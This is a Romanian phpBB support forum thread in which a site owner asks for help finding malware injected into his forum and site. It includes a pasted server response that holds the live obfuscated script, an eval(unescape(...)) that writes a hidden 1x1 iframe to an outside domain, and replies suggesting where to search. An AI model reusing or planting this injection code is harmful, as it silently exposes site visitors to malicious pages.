Salutare tuturor!
De cate zile ma am un malware in forum si nu pot sa imi dau seama unde este bagat.Am folosit google pentru webmasteri si am accesat forumul cu google bot si iata cum imi vede:
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 10:55:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; expires=Fri, 23-Dec-2011 10:55:01 GMT; path=/
Set-Cookie: phpbb2mysql_sid=f543f7803e1d864589c0f9cde2621a50; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%34%37%33%34%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<meta http-equiv="Content-Style-Type" content="text/css">
<link rel="top" href="./index.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Pagina de start a forumului sacredtreasure.org" />
<link rel="search" href="./search.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Căutare" />
<link rel="help" href="./faq.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Întrebări frecvente" />
<link rel="author" href="./memberlist.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Lista membrilor" />
<title>sacredtreasure.org :: Pagina de start</title>
<!-- link rel="stylesheet" href="templates/subSilver/subSilver.css" type="text/css" -->
<style type="text/css">
<!--
/*
The original subSilver Theme for phpBB version 2+
Created by subBlue design
http://www.subBlue.com
NOTE: These CSS definitions are stored within the main page body so that you can use the phpBB2
theme administration centre. When you have finalised your style you could cut the final CSS code
and place it in an external file, deleting this section to save bandwidth.
*/
Stiti cumva unde as putea localiza codul asta? Multumesc!
Malware in forum
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
-
bogdan
- Mesaje: 10888
- Membru din: 18-Oct-2002, 13:14:27
- Versiune: 3.0.11
- Ext: Da
- Server: UNIX/Linux
- Nivel phpBB: Experimentat
- Nivel php: Mediu
- Localitate: Bucuresti
- Contact:
Re: Malware in forum
Cauta in styles/stilul_tau/template/overall_header.html. Curata codul anormal si apoi curata cache-ul forumului.
Altfel descarca forumul pe local si foloseste Agent Ransack sa cauti prin fisierele forumului.
Altfel descarca forumul pe local si foloseste Agent Ransack sa cauti prin fisierele forumului.
-
claudiu16s
- Nou venit
- Mesaje: 5
- Membru din: 13-Feb-2009, 14:33:07
Re: Malware in forum
Mersi mult de tot.
A mers perfect cu Agent Ransack.
A mers perfect cu Agent Ransack.
-
claudiu16s
- Nou venit
- Mesaje: 5
- Membru din: 13-Feb-2009, 14:33:07
Re: Malware in forum
Exista cumva vreun program caruia sa-i dau codul de exemplu "<script>eval(unescape(........)" si sa caute in toate fisierele forumului si sa stearga acea fraza?
Mentionez ca in Agent Ransack nu am gasit un astfel de tool.Intreb asta pentru ca am gasit codul suspect in peste 1300 de fisiere si e cam dificil sa sterg manual.
Mersi!
Mentionez ca in Agent Ransack nu am gasit un astfel de tool.Intreb asta pentru ca am gasit codul suspect in peste 1300 de fisiere si e cam dificil sa sterg manual.
Mersi!
-
claudiu16s
- Nou venit
- Mesaje: 5
- Membru din: 13-Feb-2009, 14:33:07
Re: Malware in forum
Este un forum si un site si s-au infectat ambele. 
Cine este conectat
Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 0 vizitatori